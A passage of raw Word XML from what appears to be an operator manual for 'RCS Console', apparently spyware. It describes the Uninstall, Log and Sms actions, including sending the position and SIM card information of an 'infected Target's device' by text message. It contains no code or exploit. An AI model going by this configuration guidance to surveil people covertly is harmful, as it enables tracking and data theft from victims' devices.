              <w:t># Factory #</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Add Action (Uninstall)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1216" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:142.5pt;z-index:251812864;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId282" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1216" DrawAspect="Content" ObjectID="_1446455388" r:id="rId283"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00C50CE7" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one b</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>y one - in the specified order.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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5F512E" w:rsidTr="008C6F2E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C50CE7" w:rsidRDefault="00C50CE7" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C50CE7" w:rsidRDefault="00732ABF" w:rsidP="00C50CE7">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.18</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00A52C9B" w:rsidRDefault="00C50CE7" w:rsidP="00C50CE7">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(Log)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1217" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:206.25pt;z-index:251813888;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId130" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1217" DrawAspect="Content" ObjectID="_1446455389" r:id="rId284"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRPr="00C50CE7" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRPr="00C50CE7" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Text</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the log string that yo</w:t>
            </w:r>
            <w:r w:rsidR="00C50CE7" w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>u want to store on the Console.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>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5F512E" w:rsidTr="008C6F2E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008C6F2E" w:rsidRDefault="008C6F2E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRDefault="00732ABF" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.19</w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="00A52C9B" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">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(Sms)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1224" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.5pt;height:263.25pt;z-index:251821056;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId285" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1224" DrawAspect="Content" ObjectID="_1446455390" r:id="rId286"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRPr="008C6F2E" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRPr="008C6F2E" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="001D326B" w:rsidRPr="008C6F2E" w:rsidRDefault="001D326B" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Number</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the t</w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13" w:rsidRPr="00EC6F13">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">elephone number to which the message </w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">will be </w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13" w:rsidRPr="00EC6F13">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sent.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRPr="008C6F2E" w:rsidRDefault="008C6F2E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="001D326B" w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Send</w:t>
            </w:r>
            <w:r w:rsidRPr="008C6F2E">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00EC6F13">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows to specify if to send Position, Sim card information or simply a text from the infected Target’s device.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005F512E" w:rsidRPr="008C6F2E" w:rsidRDefault="005F512E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005F512E" w:rsidRDefault="005F512E" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0033183C" w:rsidRDefault="0033183C" w:rsidP="005F512E">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>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33183C" w:rsidTr="008C6F2E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="008C6F2E" w:rsidRDefault="008C6F2E" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008C6F2E" w:rsidRDefault="00732ABF" w:rsidP="008C6F2E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.20</w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="008C6F2E">
              <w:rPr>
